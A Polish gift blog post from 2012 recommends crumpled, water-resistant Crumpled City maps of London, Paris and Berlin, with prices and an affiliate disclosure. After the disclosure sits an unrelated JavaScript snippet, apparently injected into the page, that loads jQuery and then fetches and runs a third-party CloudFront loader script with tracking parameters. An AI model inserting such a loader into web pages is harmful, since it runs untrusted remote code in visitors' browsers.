Prezentuję niezwykłe mapy

26 czerwca 2012
Podstawową umiejętnością turysty jest …

Ciekawe czy wiecie co jest przysłowiową podstawową umiejętnością turysty. Nie jest to rozpalenie ogniska jedną zapałką ani wyznaczanie stron świata bez kompasu. Jest to coś znacznie trudniejszego – złożenie mapy po jej uprzednim rozłożeniu! Co prawda dziś wiele map wydawanych jest w formacie książkowym, który eliminuje potrzebę rozkładania i składania, ale wciąż częstym widokiem jest biedny turysta mocujący się z mapą, która za żadne skarby świata nie chce dać się złożyć.

Sama, choć pochodzę z rodziny bardzo turystycznej, nie raz miałam problem z odpowiednim złożeniem mapy i dlatego kiedy zobaczyłam, najpierw w internecie, a później na żywo, niezwykłe mapy, które chcę Wam dziś zaprezentować od razu postanowiłam umieścić je w cyklu wakacyjnych prezentów dla podróżników. Na czym polega niezwykłość tych map?


Po pierwsze, co od razu widać na poniższych zdjęciach – nie ma jedynego, prawidłowego sposobu złożenia tej mapy! Po drugie mapy te są wykonane ze specjalnego tworzywa, dzięki czemu tylko nie rwą się przy okazji takiego nietypowego ‘składania’, ale także są odporne na wilgoć, co sprawia, że można spokojnie korzystać z nich w deszczu bez obawy, że zaraz się rozpłyną. A do tego jeszcze taka mapa jest bardzo lekka i nie zajmuje dużo miejsca. Po prostu ideał!
 
Mapa Crumpled City Classic LONDON – cena: 45 zł (www.czerwonamaszyna.pl)

Mapa Crumpled City Classic PARIS – cena: 45 zł (www.czerwonamaszyna.pl)
Mapka dla dzieci Crumpled City Junior Berlin – cena: 39.50 zł (www.czerwonamaszyna.pl)

Jak widać na ostatnim zdjęciu dostępne są także wersje dla młodszych turystów, gdzie może mapa nie jest aż tak dokładna, ale pozwala dziecku na planowanie własnych tras w obcym mieście. Z każdym rokiem w tej serii ukazują się mapy kolejnych miast i mogę już donieść, że znajdziecie wśród nich także polską stolicę!


P.S. Zdjęcia pochodzą ze strony www.czerwonamaszyna.pl

Zawarte w tym wpisie linki do sklepu Czerwona Maszyna to tak zwane linki afiliacyjne. Oznacza to, iż jeśli klikając na nie dokonacie zakupu otrzymam z tego tytułu prowizję. Nie zmieni to w żaden sposób ceny jaką Wy zapłacicie za zamówione produkty, a pokaże mi, że doceniacie moje rekomendacje. Będę Wam bardzo wdzięczna za korzystanie z tych linków.

if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi:

Kategoria: , , , , , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję początek lata

Następny

Prezentuję torebkę dla backpackera

Comments are closed here.